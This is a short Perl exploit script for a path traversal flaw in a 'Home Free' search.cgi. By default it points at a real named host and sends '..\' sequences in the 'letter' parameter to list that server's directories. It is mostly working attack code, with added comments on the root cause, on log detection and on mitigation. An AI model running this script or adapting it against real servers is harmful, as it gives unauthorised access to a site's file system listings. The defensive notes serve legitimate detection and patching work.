#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to list
# directories on the host.
#
# Default server is antionline's, change as appropriate.
#

use IO::Socket;

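use strict;
use warnings;

# Proof-of-concept for a path traversal in Home Free's search.cgi: the
# "letter" query parameter is sent with a run of "..\" components in front
# of the caller-supplied path, and the entries of the resulting listing are
# printed one per line.
#
# Notes for defenders (inferred from the request built below, not from the
# CGI's source -- confirm against the deployed script):
#   * Root cause: search.cgi appears to use "letter" as part of a filesystem
#     path without rejecting ".." or path separators.
#   * Detection: access-log entries for /cgi-bin/search.cgi whose "letter"
#     value contains ".." together with "\" or "/" (also check URL-encoded
#     forms of those characters).
#   * Mitigation: validate "letter" against a strict allow-list, refuse any
#     path separator, and verify the canonicalised path stays under the
#     intended base directory before reading it.

# Require a non-empty path argument. @ARGV may be empty, so test definedness
# first instead of comparing undef with eq.
my $target_dir = $ARGV[0];
if (!defined $target_dir || $target_dir eq "") { die "no argument\n"; }

my $asoc = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => "members.antionline.com",
                                 PeerPort => 80)
    or die "can't connect to host: $!";

# Unbuffer the socket directly rather than via select()/$|, so the default
# output handle stays STDOUT for the rest of the script.
$asoc->autoflush(1);

print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$target_dir&start=1&perpage=all HTTP/1.0\n\n";

# Only response lines containing HREF followed by TD are treated as listing
# rows (presumably one table row per entry -- inferred from the pattern).
while (my $line = <$asoc>) {
    next unless $line =~ /.+HREF.+TD.+/;

    # The link target is the text between the first pair of double quotes.
    my $href = (split /"/, $line)[1];
    next unless defined $href;

    # The entry name is the fourth "/"-separated component of that link.
    my $name = (split m{/}, $href)[3];
    next unless defined $name;

    # NOTE(review): $name is server-controlled data echoed to the terminal.
    print "$name\n";
}

# The original closed the bareword handle ASOC, which was never opened, so
# the socket was left open until exit; close the lexical handle instead.
close($asoc);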
